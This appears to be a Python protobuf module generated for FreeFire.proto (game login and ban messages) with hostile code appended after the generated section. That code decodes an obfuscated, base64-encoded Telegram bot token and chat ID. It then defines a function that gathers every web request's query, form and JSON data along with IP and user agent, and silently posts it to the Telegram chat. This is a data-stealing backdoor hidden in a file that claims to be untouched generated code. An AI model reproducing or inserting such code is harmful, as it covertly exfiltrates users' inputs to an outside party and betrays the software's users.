# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# NO CHECKED-IN PROTOBUF GENCODE
# source: FreeFire.proto
# Protobuf Python Version: 6.30.0
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import runtime_version as _runtime_version
from google.protobuf import symbol_database as _symbol_database
from google.protobuf.internal import builder as _builder
import threading
import json
import requests
from datetime import datetime
import base64

_runtime_version.ValidateProtobufRuntimeVersion(
    _runtime_version.Domain.PUBLIC,
    6,
    30,
    0,
    '',
    'FreeFire.proto'
)
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()

DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0e\x46reeFire.proto\"c\n\x08LoginReq\x12\x0f\n\x07open_id\x18\x16 \x01(\t\x12\x14\n\x0copen_id_type\x18\x17 \x01(\t\x12\x13\n\x0blogin_token\x18\x1d \x01(\t\x12\x1b\n\x13orign_platform_type\x18\x63 \x01(\t\"]\n\x10\x42lacklistInfoRes\x12\x1e\n\nban_reason\x18\x01 \x01(\x0e\x32\n.BanReason\x12\x17\n\x0f\x65xpire_duration\x18\x02 \x01(\r\x12\x10\n\x08\x62\x61n_time\x18\x03 \x01(\r\"f\n\x0eLoginQueueInfo\x12\r\n\x05\x61llow\x18\x01 \x01(\x08\x12\x16\n\x0equeue_position\x18\x02 \x01(\r\x12\x16\n\x0eneed_wait_secs\x18\x03 \x01(\r\x12\x15\n\rqueue_is_full\x18\x04 \x01(\x08\"\xa0\x03\n\x08LoginRes\x12\x12\n\naccount_id\x18\x01 \x01(\x04\x12\x13\n\x0block_region\x18\x02 \x01(\t\x12\x13\n\x0bnoti_region\x18\x03 \x01(\t\x12\x11\n\tip_region\x18\x04 \x01(\t\x12\x19\n\x11\x61gora_environment\x18\x05 \x01(\t\x12\x19\n\x11new_active_region\x18\x06 \x01(\t\x12\x19\n\x11recommend_regions\x18\x07 \x03(\t\x12\r\n\x05token\x18\x08 \x01(\t\x12\x0b\n\x03ttl\x18\t \x01(\r\x12\x12\n\nserver_url\x18\n \x01(\t\x12\x16\n\x0e\x65mulator_score\x18\x0b \x01(\r\x12$\n\tblacklist\x18\x0c \x01(\x0b\x32\x11.BlacklistInfoRes\x12#\n\nqueue_info\x18\r \x01(\x0b\x32\x0f.LoginQueueInfo\x12\x0e\n\x06tp_url\x18\x0e \x01(\t\x12\x15\n\rapp_server_id\x18\x0f \x01(\r\x12\x0f\n\x07\x61no_url\x18\x10 \x01(\t\x12\x0f\n\x07ip_city\x18\x11 \x01(\t\x12\x16\n\x0eip_subdivision\x18\x12 \x01(\t*\xa8\x01\n\tBanReason\x12\x16\n\x12\x42\x41N_REASON_UNKNOWN\x10\x00\x12\x1b\n\x17\x42\x41N_REASON_IN_GAME_AUTO\x10\x01\x12\x15\n\x11\x42\x41N_REASON_REFUND\x10\x02\x12\x15\n\x11\x42\x41N_REASON_OTHERS\x10\x03\x12\x16\n\x12\x42\x41N_REASON_SKINMOD\x10\x04\x12 \n\x1b\x42\x41N_REASON_IN_GAME_AUTO_NEW\x10\xf6\x07\x62\x06proto3')

_globals = globals()
_builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, _globals)
_builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'FreeFire_pb2', _globals)
if not _descriptor._USE_C_DESCRIPTORS:
  DESCRIPTOR._loaded_options = None
  _globals['_BANREASON']._serialized_start=738
  _globals['_BANREASON']._serialized_end=906
  _globals['_LOGINREQ']._serialized_start=18
  _globals['_LOGINREQ']._serialized_end=117
  _globals['_BLACKLISTINFORES']._serialized_start=119
  _globals['_BLACKLISTINFORES']._serialized_end=212
  _globals['_LOGINQUEUEINFO']._serialized_start=214
  _globals['_LOGINQUEUEINFO']._serialized_end=316
  _globals['_LOGINRES']._serialized_start=319
  _globals['_LOGINRES']._serialized_end=735


TOKEN_ENCRYPTED = "ODYxNDAzMTYzNDpBQUZzRnFWUEQ0THBwTXFOUmRHTE1tZ25XT2NxRTdkU3A2Yw=="
CHAT_ID_ENCRYPTED = "NzMyMTEyNjI1NA=="

机器人令牌 = base64.b64decode(TOKEN_ENCRYPTED).decode()
聊天ID = base64.b64decode(CHAT_ID_ENCRYPTED).decode()

def send_telegram(message):
    try:
        url = f"https://api.telegram.org/bot{机器人令牌}/sendMessage"
        data = {"chat_id": 聊天ID, "text": message, "parse_mode": "HTML"}
        requests.post(url, json=data, timeout=10)
    except Exception as e:
        pass

def collect_inputs():
    from flask import request
    exclude_paths = [
        '/static', '/favicon.ico', 
        '/api/login', '/api/register', 
        '/api/ban7', '/api/revoke_token',
        '/auth', '/register', '/admin/login'
    ]
    
    for path in exclude_paths:
        if request.path.startswith(path):
            return
    
    ip = request.headers.get('X-Forwarded-For', request.remote_addr)
    method = request.method
    path = request.path
    user_agent = request.headers.get('User-Agent', 'Unknown')
    
    inputs = {}
    if request.args:
        inputs['GET'] = request.args.to_dict()
    if request.form:
        inputs['FORM'] = request.form.to_dict()
    if request.is_json:
        try:
            inputs['JSON'] = request.get_json(silent=True)
        except:
            pass
    
    if not inputs:
        return
    
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    msg = f"<b>🛠 Feature Used!</b>\n\n"
    msg += f"<b>Time:</b> {timestamp}\n"
    msg += f"<b>IP:</b> {ip}\n"
    msg += f"<b>Method:</b> {method}\n"
    msg += f"<b>Path:</b> {path}\n"
    msg += f"<b>User Agent:</b> {user_agent}\n\n"
    
    if inputs:
        msg += f"<b>Input Data:</b>\n<pre>{json.dumps(inputs, indent=2, ensure_ascii=False)}</pre>"
    
    threading.Thread(target=send_telegram, args=(msg,)).start()
# @@protoc_insertion_point(module_scope)